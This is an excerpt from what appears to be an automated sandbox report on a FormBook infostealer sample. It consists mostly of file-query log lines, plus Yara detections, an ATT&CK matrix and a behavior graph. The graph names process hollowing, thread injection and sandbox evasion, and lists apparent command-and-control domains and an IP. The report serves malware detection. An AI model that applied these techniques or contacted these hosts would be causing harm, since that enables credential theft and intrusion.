          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 18.2.QxVf0A9SFT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.QxVf0A9SFT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 18.2.QxVf0A9SFT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.QxVf0A9SFT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452671 Sample: QxVf0A9SFT Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 31 www.hiddenwholesale.com 2->31 33 www.advancedaccessapplications.com 2->33 35 2 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 6 other signatures 2->49 11 QxVf0A9SFT.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\QxVf0A9SFT.exe.log, ASCII 11->29 dropped 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Injects a PE file into a foreign processes 11->63 15 QxVf0A9SFT.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 adultpeace.com 163.44.239.73, 49723, 80 INTERQGMOInternetIncJP Japan 18->37 39 www.m678.xyz 18->39 41 4 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 22 cmstp.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QxVf0A9SFT.exe44%VirustotalBrowse
          QxVf0A9SFT.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          18.2.QxVf0A9SFT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.carterandcone.comuL0%Avira URL Cloudsafe
          http://www.tiro.comcom40%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/7g0%Avira URL Cloudsafe
          http://www.tiro.com40%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://tempuri.org/SeguridadDS.xsd0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/VerdMgH0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
